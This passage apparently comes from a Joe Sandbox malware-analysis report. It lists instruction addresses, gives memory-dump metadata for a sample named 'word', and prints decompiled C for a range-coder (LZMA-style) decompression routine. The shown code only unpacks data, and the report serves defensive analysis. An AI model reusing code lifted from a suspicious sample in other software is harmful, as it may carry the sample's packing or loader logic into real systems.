                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fc2
                                                          0x00405fc2
                                                          0x00405fc6
                                                          0x00406872
                                                          0x00000000
                                                          0x00406872
                                                          0x00405fcf
                                                          0x00405fdf
                                                          0x00405fe2
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe8
                                                          0x00405fec
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fee
                                                          0x00405ff4
                                                          0x0040601e
                                                          0x00406024
                                                          0x0040602b
                                                          0x00000000
                                                          0x0040602b
                                                          0x00405ffa
                                                          0x00405ffd
                                                          0x00406002
                                                          0x00406002
                                                          0x0040600d
                                                          0x00406015
                                                          0x00406018
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040605d
                                                          0x00406063
                                                          0x00406066
                                                          0x00406073
                                                          0x0040607b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406032
                                                          0x00406032
                                                          0x00406036
                                                          0x00406881
                                                          0x00000000
                                                          0x00406881
                                                          0x00406042
                                                          0x0040604d
                                                          0x0040604d
                                                          0x0040604d
                                                          0x00406050
                                                          0x00406053
                                                          0x00406056
                                                          0x0040605b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406083
                                                          0x00406085
                                                          0x00406088
                                                          0x004060f9
                                                          0x004060fc
                                                          0x004060ff
                                                          0x00406106
                                                          0x00406110
                                                          0x00000000
                                                          0x00406110
                                                          0x0040608a
                                                          0x0040608e
                                                          0x00406091
                                                          0x00406093
                                                          0x00406096
                                                          0x00406099
                                                          0x0040609b
                                                          0x0040609e
                                                          0x004060a0
                                                          0x004060a5
                                                          0x004060a8
                                                          0x004060ab
                                                          0x004060af
                                                          0x004060b6
                                                          0x004060b9
                                                          0x004060c0
                                                          0x004060c4
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060d0
                                                          0x004060d3
                                                          0x004060f1
                                                          0x004060f3
                                                          0x00000000
                                                          0x004060d5
                                                          0x004060d5
                                                          0x004060d8
                                                          0x004060db
                                                          0x004060de
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e3
                                                          0x004060e6
                                                          0x004060e8
                                                          0x004060e9
                                                          0x004060ec
                                                          0x00000000
                                                          0x004060ec
                                                          0x00000000
                                                          0x00406322
                                                          0x00406326
                                                          0x00406344
                                                          0x00406347
                                                          0x0040634e
                                                          0x00406351
                                                          0x00406354
                                                          0x00406357
                                                          0x0040635a
                                                          0x0040635d
                                                          0x0040635f
                                                          0x00406366
                                                          0x00406367
                                                          0x00406369
                                                          0x0040636c
                                                          0x0040636f
                                                          0x00406372
                                                          0x00406372
                                                          0x00406377
                                                          0x00000000
                                                          0x00406377
                                                          0x00406328
                                                          0x0040632b
                                                          0x0040632e
                                                          0x00406338
                                                          0x00000000
                                                          0x00000000
                                                          0x0040638c
                                                          0x00406390
                                                          0x004063b3
                                                          0x004063b6
                                                          0x004063b9
                                                          0x004063c3
                                                          0x00406392
                                                          0x00406392
                                                          0x00406395
                                                          0x00406398
                                                          0x0040639b
                                                          0x004063a8
                                                          0x004063ab
                                                          0x004063ab
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406440
                                                          0x00406444
                                                          0x0040644b
                                                          0x0040644e
                                                          0x00406451
                                                          0x0040645b
                                                          0x00000000
                                                          0x0040645b
                                                          0x00406446
                                                          0x00000000
                                                          0x00000000
                                                          0x00406467
                                                          0x0040646b
                                                          0x00406472
                                                          0x00406475
                                                          0x00406478
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040647b
                                                          0x0040647e
                                                          0x00406481
                                                          0x00406481
                                                          0x00406484
                                                          0x00406487
                                                          0x00000000
                                                          0x00000000
                                                          0x00406527
                                                          0x00406527
                                                          0x0040652b
                                                          0x004068c9
                                                          0x00000000
                                                          0x004068c9
                                                          0x00406531
                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040611c
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x00000000
                                                          0x0040688d
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00406141
                                                          0x00406141
                                                          0x00406144
                                                          0x00406147
                                                          0x00000000
                                                          0x00000000
                                                          0x0040614d
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00406159
                                                          0x00406159
                                                          0x0040615d
                                                          0x00406160
                                                          0x00406163
                                                          0x00406166
                                                          0x00406169
                                                          0x0040616a
                                                          0x0040616d
                                                          0x0040616f
                                                          0x00406175
                                                          0x00406178
                                                          0x0040617b
                                                          0x0040617e
                                                          0x00406181
                                                          0x00406184
                                                          0x00406187
                                                          0x004061a3
                                                          0x004061a6
                                                          0x004061a9
                                                          0x004061ac
                                                          0x004061b3
                                                          0x004061b7
                                                          0x004061b9
                                                          0x004061bd
                                                          0x00406189
                                                          0x00406189
                                                          0x0040618d
                                                          0x00406195
                                                          0x0040619a
                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x00000000
                                                          0x004066ec
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x00000000
                                                          0x0040685f
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563
                                                          0x00406566
                                                          0x00406568
                                                          0x0040656b
                                                          0x0040656e
                                                          0x0040656e
                                                          0x00406571
                                                          0x00406571
                                                          0x00406574
                                                          0x0040657b
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x00000000
                                                          0x0040657d
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657b
                                                          0x00406501
                                                          0x00406504
                                                          0x00406506
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x00406268
                                                          0x00406268
                                                          0x0040626c
                                                          0x004068b1
                                                          0x00000000
                                                          0x004068b1
                                                          0x00406272
                                                          0x00406275
                                                          0x00406278
                                                          0x0040627b
                                                          0x0040627e
                                                          0x00406281
                                                          0x00406284
                                                          0x00406286
                                                          0x00406289
                                                          0x0040628c
                                                          0x0040628f
                                                          0x00406291
                                                          0x00406291
                                                          0x00406291
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406670
                                                          0x00406670
                                                          0x00406670
                                                          0x00406674
                                                          0x00000000
                                                          0x00000000
                                                          0x0040667a
                                                          0x0040667d
                                                          0x00406680
                                                          0x00406683
                                                          0x00406685
                                                          0x00406685
                                                          0x00406685
                                                          0x00406688
                                                          0x0040668b
                                                          0x0040668e
                                                          0x00406691
                                                          0x00406694
                                                          0x00406697
                                                          0x00406698
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669d
                                                          0x004066a0
                                                          0x004066a3
                                                          0x004066a6
                                                          0x004066a9
                                                          0x004066ad
                                                          0x004066af
                                                          0x004066b2
                                                          0x00000000
                                                          0x004066b4
                                                          0x00000000
                                                          0x004066b4
                                                          0x004066b2
                                                          0x004068e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37a6e0cc647a8bcf712af8254647d354cdd6ee6681e937b8812b349d59c70459
                                                          • Instruction ID: fc637cc57031d6fa7fc43ec0fa9912bbb078f827e800a3857ce4fc75fdb5e0f4
                                                          • Opcode Fuzzy Hash: 37a6e0cc647a8bcf712af8254647d354cdd6ee6681e937b8812b349d59c70459
                                                          • Instruction Fuzzy Hash: 00815771D00229CFDF24CFA8C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406322 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E00406322() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406926))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
